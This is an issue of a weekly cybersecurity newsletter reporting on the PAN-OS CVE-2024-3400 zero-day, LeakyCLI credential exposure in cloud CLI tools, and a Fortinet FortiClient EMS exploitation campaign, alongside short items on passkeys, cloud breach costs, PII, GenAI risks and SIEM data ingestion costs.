Good Morning and Happy Friday - Your weekly sip of the latest in cybersecurity from the Cybersec Cafe: Palo Alto Networks Under Attack. Risk in the Cloud. Data Ingestion costs are getting out of control.

Critical Flaw in Palo Alto Networks PAN-OS Under Attack

Palo Alto Networks has issued a stark warning regarding a critical vulnerability, CVE-2024-3400, affecting its PAN-OS software used in GlobalProtect gateways. With a CVSS score of 10.0, the flaw allows unauthenticated attackers to execute arbitrary code with root privileges on impacted firewalls. This vulnerability affects specific PAN-OS versions and configurations, emphasizing the urgency of applying the fixes slated for release April 14. While Palo Alto Networks is actively addressing the issue, organizations are advised to enable Threat ID 95187 as a temporary measure to bolster security against potential exploits. This alert underscores the escalating threat landscape, exemplified by recent zero-day exploits leveraged by threat actors for covert network access and persistence.

Threat actors have exploited the disclosed zero-day flaw for nearly three weeks before its public disclosure. This command injection vulnerability enables attackers to execute arbitrary code with root privileges on affected firewalls. Dubbed Operation MidnightEclipse, the activity involves the creation of a cron job fetching commands from an external server to launch a Python-based backdoor, facilitating unauthorized access and data exfiltration. With the flaw affecting PAN-OS 10.2, 11.0, and 11.1 configurations, organizations are urged to apply forthcoming patches promptly to mitigate risks and safeguard network integrity against sophisticated threat actors.

Did You Know?

1. Passkeys - Is this what the internet needs?
   The FIDO Alliance points out that passwords are the root of 80% of data breaches. Everyone has heard the advice that every online account must have a strong, unique password - requiring the use of a password manager. But this perceived friction keeps a lot of users from doing this to maintain basic account security. With social engineering and phishing attacks continuing to be a risk as well as credentials being easily harvestable from data breach records, the internet needs better security - exactly what Passkey’s are trying to promise.

2. Hybrid Cloud is the Way
   With the rise of cloud based services, cloud computing vulnerabilities have become a prominent concern in cybersecurity. Approximately 45% of data breaches occur in the cloud. However, organizations adopting a hybrid cloud model, which combines public and private clouds, experience lower average breach costs ($3.80 million) compared to those with solely public ($5.02 million) or private ($4.24 million) cloud models.

3. PII
   Personally identifiable information (PII) encompasses sensitive data like names, email addresses, and Social Security numbers. Hackers often exploit this information for identity theft as it can often be found using Open Source Intelligence. Protect your identity by refraining from sharing PII, especially on social media, and consider removing any personal information from online platforms to minimize the risk of identity theft. And, as always, beware of phishing or vishing attacks.

Securing Cloud Environments: Beware of CLI Vulnerabilities

Recent research highlights a critical vulnerability in command-line interface (CLI) tools from major cloud providers like Amazon Web Services (AWS) and Google Cloud, termed LeakyCLI by security firm Orca. These tools, including commands such as aws lambda get-function-configuration and gcloud functions deploy, can inadvertently expose sensitive credentials in build logs, posing significant risks to organizations. While Microsoft has addressed the issue with CVE-2023-36052, both Amazon and Google consider this behavior expected, emphasizing the need for organizations to avoid storing secrets in environment variables and instead utilize dedicated secrets management services like AWS Secrets Manager or Google Cloud Secret Manager.

This week at the Cybersec Cafe…

SSRF with Filter Bypass via Open Redirection

Learn the step-by-step of the methodology behind leveraging an Open Redirect to exploit SSRF with a Filter Bypass, then give it a try yourself!

Full article here.

AI Headache

The rise of Generative AI (GenAI) tools like ChatGPT has ushered in a new era of productivity in the software industry, but with it comes a wave of security concerns. While GenAI promises enhanced efficiency and creativity, its use in the workplace raises alarms about data security and privacy. Organizations face challenges in controlling GenAI adoption and mitigating associated risks, prompting reactive bans from some sectors and heightened scrutiny from governments. . With the evolving landscape of hybrid work models and blurred lines between personal and professional technology usage, it's crucial for businesses to implement robust governance frameworks and security measures to safeguard against emerging threats and regain control over their SaaS ecosystem

Worth the Read

1. While some of my readers may see these tips as “obvious,” this article serves as a nice reminder of just how to be more conscious of our digital footprint, highlighting some great tips to ensure your digital data isn’t being overly shared. A little refresher never hurt nobody!

2. OSINT is an important part of cybersecurity, whether you’re playing offense or defense. Knowing the tools available to you can make your OSINT processes more efficient and also allow you to find more information. This blog post details the different tools you can integrate into your processes.

Exploitation Campaign Targets Fortinet Flaw

Cybersecurity researchers have uncovered a new campaign exploiting a critical security vulnerability, CVE-2023-48788, in Fortinet FortiClient EMS devices to deliver ScreenConnect and Metasploit Powerfun payloads. Tracked as Connect:fun by Forescout, the intrusion targeted a media company shortly after the release of a proof-of-concept exploit on March 21, 2024, highlighting the urgency of patching vulnerable systems. The threat actor, displaying manual intervention, attempted to download and install tools, signaling a targeted campaign rather than automated cybercriminal activity.

Your Thoughts?

Data Ingestion Cost

For those familiar with working in a Security Operations Center (SOC), you know how critically our operations rely on data. For those unacquainted, the crux of the Security Operations Center lies in the ingestion of data into the Security Incident Event Management (SIEM) system. This tool facilitates the intake of logs from various systems, drives security alerting, and manages events for any system it ingests and sets up detections for. While there are a lot of use cases in cybersecurity that are built on log ingestion, the SIEM stands as an indispensable element in ensuring organizational security.

An alarming case surfaced in 2023 where a customer was slapped with a staggering $65 million bill for their data ingestion expenses into their SIEM. The costs associated with data ingestion have spiraled to an insane level for organizations.

Furthermore, opting for a particular SIEM provider often results in vendor lock-in due to the substantial investment, both financially and man-hours, required to transition to an alternative solution.

In light of this issue, we're witnessing the emergence of SIEM solutions that can be constructed on top of a data lake, offering SOC teams the flexibility to seamlessly maneuver their data across different tools. However, at the moment, there haven’t been many products to come to market that fully support numerous data lake solutions.

But, is this the way of the future?

Leave a comment

Navigating the Risks of AI in Software Development

As artificial intelligence (AI) continues to take shape in our world, the security implications of its integration into software development cannot be ignored. From GitHub Copilot's code suggestions to broader AI-generated vulnerabilities, the potential risks demands demand more than a stern glance. While AI holds much promise for innovation, its rapid advancement has outpaced security measures, leaving systems vulnerable to prompt injection and other sophisticated attacks. While security concerns generally lag behind development of all software, we should tread these waters more lightly.

Securely Yours,

The Cybersec Cafe

Just a heads up, The Cybersec Cafe's got a pretty cool weekly cadence.

Every week, expect to dive into the hacker’s mindset in our Methodology Walkthroughs or explore Deep Dive articles on various cybersecurity topics.

. . .

Oh, and if you want even more content and updates, hop over to Ryan G. Cox on Twitter/X or my Website. Can't wait to keep sharing and learning together!